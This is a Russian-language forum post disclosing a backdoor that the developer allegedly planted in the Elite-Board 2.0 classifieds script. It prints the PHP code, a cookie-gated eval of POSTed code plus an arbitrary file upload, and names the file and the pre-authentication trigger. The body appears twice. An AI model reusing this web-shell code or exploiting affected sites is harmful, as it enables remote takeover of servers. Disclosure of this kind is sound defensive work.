Disasm
12.10.2016, 03:48
Друзья, всех приветствую! Стараюсь по пустякам не обращаться за помощью, но ситуация складывается абсолютно безнадёжная.
Существует старый, как говно мамонта, скрипт доски объявлений - "Elite-Board", разработчик: http://illusionweb.org/
В данный скрипт разработчик внедрил бэкдор, подробнее: http://searchengines.guru/showthread.php?t=770644
Код бэкдора:
if(isset($_COOKIE['megasecret']))
{
if($_COOKIE['megasecret'] =='удалено на всякий случ й')
{
echo'
stripslashes
';
if($_POST['mega-exe'] !='')
{
if($_POST['mega-str'] !='')
{
$_POST['mega-exe'] =stripslashes($_POST['mega-exe']);
}
eval($_POST['mega-exe']);
}
echo'';
if(file_exists($_FILES['mega-file']['tmp_name']))
{
move_uploaded_file($_FILES['mega-file']['tmp_name'],$_POST['mega-path'].$_FILES['mega-file']['name']);
}
exit();
}
}
Бэкдор покоится в файле includes/optimizer/admin/funct.php, инклудится при входе в админку (до авторизации, т.е. авторизация не требуется). Бэкдор по стандарту завёрнут в eval(base64_decode()). Сам файл (funct.php) зашифрован зендом.
Бэкдор присутствует в версиях Elite-Board 2.0
Существует старый, как говно мамонта, скрипт доски объявлений - "Elite-Board", разработчик: http://illusionweb.org/
В данный скрипт разработчик внедрил бэкдор, подробнее: http://searchengines.guru/showthread.php?t=770644
Код бэкдора:
if(isset($_COOKIE['megasecret']))
{
if($_COOKIE['megasecret'] =='удалено на всякий случ й')
{
echo'
stripslashes
';
if($_POST['mega-exe'] !='')
{
if($_POST['mega-str'] !='')
{
$_POST['mega-exe'] =stripslashes($_POST['mega-exe']);
}
eval($_POST['mega-exe']);
}
echo'';
if(file_exists($_FILES['mega-file']['tmp_name']))
{
move_uploaded_file($_FILES['mega-file']['tmp_name'],$_POST['mega-path'].$_FILES['mega-file']['name']);
}
exit();
}
}
Бэкдор покоится в файле includes/optimizer/admin/funct.php, инклудится при входе в админку (до авторизации, т.е. авторизация не требуется). Бэкдор по стандарту завёрнут в eval(base64_decode()). Сам файл (funct.php) зашифрован зендом.
Бэкдор присутствует в версиях Elite-Board 2.0